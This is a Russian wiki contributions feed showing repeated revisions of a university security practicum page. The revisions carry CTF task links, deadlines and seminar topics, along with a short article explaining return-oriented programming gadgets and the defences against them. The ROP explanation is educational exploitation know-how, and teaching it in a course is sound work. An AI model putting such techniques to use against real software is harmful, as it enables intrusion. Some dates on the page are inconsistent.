SecSem Wiki - Вклад [ru]

Практикум на ЭВМ (2025)

2025-12-08T23:08:13Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ таски на pwn

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 391 и 392.

* '''Когда''': по понедельникам 12:50,
* '''Где''': аудитория 790

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 392, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2025/2026 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [http://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

Доступ к заданиям осуществляется через VPN, доступы к которому можно получить у старосты.

=== Веб ===
* [[Практикум_на_ЭВМ_(2025)/Бонусное_задание|Бонусное задание]]
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 14.11.2024 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.12.2025 23:43)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2025 reverse tasks.zip|Задания по реверсу]] (deadline - 17.12.2025 23:59:59.999999 MSK)
* [[Media:2025 pwn tasks.zip|Задания по бинарной эксплутации]] (deadline - 23.12.2025 23:59:59)
* [https://drive.google.com/file/d/1QcgUUOuKrBB0zce9Er5OCAPIVTQ5jig5/view?usp=sharing task 2] <code>nc fdca:22c8:7316::1 16966</code> (deadline - 23.12.2025 23:59:59)

=== Криптография и криптоанализ ===

== Материалы ==

=== Веб ===

Семинар 1 (15 сентября 2025) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (22 сентября 2025) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (29 сентября 2025) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (6 октября 2025) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (13 октября 2025) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (20 октября 2025) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (27 октября 2025) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (10 ноября 2025) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

=== Криптография и криптоанализ ===

=== Сетевая безопасность ===

== Примечания ==
<references/>

Файл:2025 pwn tasks.zip

2025-12-08T23:07:51Z

WGH:

Практикум на ЭВМ (2025)

2025-12-08T23:00:22Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ викиформатирование

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 391 и 392.

* '''Когда''': по понедельникам 12:50,
* '''Где''': аудитория 790

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 392, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2025/2026 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [http://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

Доступ к заданиям осуществляется через VPN, доступы к которому можно получить у старосты.

=== Веб ===
* [[Практикум_на_ЭВМ_(2025)/Бонусное_задание|Бонусное задание]]
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 14.11.2024 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.12.2025 23:43)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2025 reverse tasks.zip|Задания по реверсу]] (deadline - 17.12.2025 23:59:59.999999 MSK)

* [https://drive.google.com/file/d/1QcgUUOuKrBB0zce9Er5OCAPIVTQ5jig5/view?usp=sharing task 2] <code>nc fdca:22c8:7316::1 16966</code> (deadline - 23.12.2025 23:59:59)

=== Криптография и криптоанализ ===

== Материалы ==

=== Веб ===

Семинар 1 (15 сентября 2025) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (22 сентября 2025) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (29 сентября 2025) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (6 октября 2025) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (13 октября 2025) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (20 октября 2025) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (27 октября 2025) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (10 ноября 2025) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

=== Криптография и криптоанализ ===

=== Сетевая безопасность ===

== Примечания ==
<references/>

Практикум на ЭВМ (2025)

2025-12-03T07:05:20Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ 2023 -> 2025

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 391 и 392.

* '''Когда''': по понедельникам 12:50,
* '''Где''': аудитория 790

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 392, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2025/2026 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [http://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

Доступ к заданиям осуществляется через VPN, доступы к которому можно получить у старосты.

=== Веб ===
* [[Практикум_на_ЭВМ_(2025)/Бонусное_задание|Бонусное задание]]
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 14.11.2024 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.12.2025 23:43)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2025 reverse tasks.zip|Задания по реверсу]] (deadline - 17.12.2025 23:59:59.999999 MSK)


=== Криптография и криптоанализ ===

== Материалы ==

=== Веб ===

Семинар 1 (15 сентября 2025) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (22 сентября 2025) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (29 сентября 2025) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (6 октября 2025) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (13 октября 2025) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (20 октября 2025) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (27 октября 2025) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (10 ноября 2025) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

=== Криптография и криптоанализ ===

=== Сетевая безопасность ===

== Примечания ==
<references/>

Практикум на ЭВМ (2025)

2025-12-02T23:53:32Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 391 и 392.

* '''Когда''': по понедельникам 12:50,
* '''Где''': аудитория 790

Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 392, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2025/2026 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [http://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

Доступ к заданиям осуществляется через VPN, доступы к которому можно получить у старосты.

=== Веб ===
* [[Практикум_на_ЭВМ_(2025)/Бонусное_задание|Бонусное задание]]
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.11.2024 23:59)
* http://shop.tasks.prak.seclab.cs.msu.ru/ (deadline - 14.11.2024 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://jpg.tasks.prak.seclab.cs.msu.ru (deadline - 06.12.2025 23:59)
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 08.12.2025 23:43)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2025 reverse tasks.zip|Задания по реверсу]] (deadline - 17.12.2023 23:59:59.999999 MSK)


=== Криптография и криптоанализ ===

== Материалы ==

=== Веб ===

Семинар 1 (15 сентября 2025) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (22 сентября 2025) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (29 сентября 2025) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (6 октября 2025) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (13 октября 2025) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (20 октября 2025) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (27 октября 2025) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (10 ноября 2025) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

=== Криптография и криптоанализ ===

=== Сетевая безопасность ===

== Примечания ==
<references/>

Файл:2025 reverse tasks.zip

2025-12-02T23:52:47Z

WGH:

MediaWiki:Vector.css

2025-09-06T17:08:07Z

WGH: Полностью удалено содержимое страницы

Практикум на ЭВМ (2023)

2023-12-04T17:41:44Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ december

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 706

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru/</s> (dedline - 23.11.2023 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)
* [[Media:2023 pwn tasks.tar.gz|Задания по бинарной эксплутации]] (deadline - 17.12.2023 23:59:59.999999 MSK)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (23 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (20 ноября 2022) [[Бинарные_уязвимости/Переполнение_стека]]

Семинар 11 (27 ноября 2022) [[Бинарные_уязвимости/ROP]]

== Примечания ==
<references/>

Файл:2023 pwn tasks.tar.gz

2023-12-02T23:43:49Z

WGH:

Практикум на ЭВМ (2023)

2023-12-02T23:37:59Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */ задания!

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 706

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru/</s> (dedline - 23.11.2023 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)
* [[Media:2023 pwn tasks.tar.gz|Задания по бинарной эксплутации]] (deadline - 17.11.2023 23:59:59.999999 MSK)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (23 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (20 ноября 2022) [[Бинарные_уязвимости/Переполнение_стека]]

Семинар 11 (27 ноября 2022) [[Бинарные_уязвимости/ROP]]

== Примечания ==
<references/>

Бинарные уязвимости/ROP

2023-12-02T17:27:05Z

WGH: Новая страница: «'''Возвратно-ориентированное программирование''' ('''return-oriented programming''', '''ROP''') — техника экс…»

'''Возвратно-ориентированное программирование''' ('''return-oriented programming''', '''ROP''') — техника эксплуатации перезаписи стека вызовов.

== Описание техники ==

В ситуации, когда присутствует NX (защита от выполнения данных как кода), одним из выходом является переииспользование существующих фрагментов кода, чтобы вызвать какие-то библиотечные функции или системные вызовы.

Но сперва нужно помнить, что, в соотвествии с [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI System V AMD64 ABI], для передачи аргументов функций используются регистры. Значит, аргументы нельзя просто так положить на стек, их нужно как-то поместить в регистры.

Мы рассматриваем, в первую очердь, подобные фрагменты кода (x86_64):

<pre>
pop rdi
ret

pop rsi
pop r15
ret
</pre>

Например, если в стеке на место адреса возврата положить последовательно адрес гаджета <code>pop rdi; ret</code>, число 4, и адрес функции <code>f</code>, то это будет иметь такой же эффект, как будто функция <code>f</code> была вызвана с аргументом 4.

Из гаджетов можно составлять длинные цепочки с последовательным заданием нескольких регистров, вызовами разных функций, и т.д.

== Где искать гаджеты ==

Гаджеты <code>pop rdi; ret</code> с самыми интересными нам регистрами не встречаются естественным образом в типичной программе. Однако они встречаются, если рассматривать не только начала легитимных инструкций, но и середины. Для автоматического поиска гаджетов можно использовать, например, [https://github.com/JonathanSalwan/ROPgadget ROPgadget] или [https://github.com/sashs/Ropper ropper].

Есть известный гаджет "ret2csu", который не находится автоматически, но присутствует почти всегда, и позволяет вызвать функцию с тремя аргументами.

== Средства защиты ==

Во-первых, stack canary. Функция перед выходом перепроверяет, что секретное значение перед адресом возврата не было испорчено. Чтобы это обойти, нужно или как-то писать сразу за "канарейку", или предварительно узнать значение "канарейки", чтобы при перезаписи её оставить прежним.

Во-вторых, ASLR. Сама программа, библиотеки, и стек будут находиться на случайных смещениях в памяти, изменяющихся при каждом запуске. Если не обойти это, узнав каким-нибудь образом фактические адреса загрузки, составить ROP-цепочку не получится, поскольку туда нужно записывать абсолютные адреса функций/строк/etc..

== См. также ==

* [[Введение_в_практическую_безопасность_(2019)/Бинарная_эксплуатация]]

Практикум на ЭВМ (2023)

2023-12-02T16:41:04Z

WGH: /* Реверс-инжиниринг и бинарная эксплуатация */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по понедельникам, 12:50
* '''Где''': аудитория 706

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru/</s> (dedline - 23.11.2023 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (23 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (20 ноября 2022) [[Бинарные_уязвимости/Переполнение_стека]]

